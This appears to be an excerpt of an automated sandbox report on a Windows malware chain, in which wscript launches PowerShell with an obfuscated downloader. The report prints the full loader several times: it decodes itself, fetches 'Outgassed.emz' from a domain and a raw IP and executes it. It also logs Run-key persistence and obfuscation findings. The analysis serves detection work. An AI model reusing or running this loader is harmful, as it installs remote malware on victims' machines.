rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,	Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8809AD push E85E535Dh; ret	1_2_00007FFD9B8809F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B955479 push ebp; iretd	1_2_00007FFD9B955538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0454EC78 pushfd ; retf	4_2_0454EC79
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_045436D9 push ebx; iretd	4_2_045436DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_073D1D28 push eax; mov dword ptr [esp], ecx	4_2_073D21B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_073DA555 push esp; retf	4_2_073DA559
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_073D219E push eax; mov dword ptr [esp], ecx	4_2_073D21B4

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key			Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
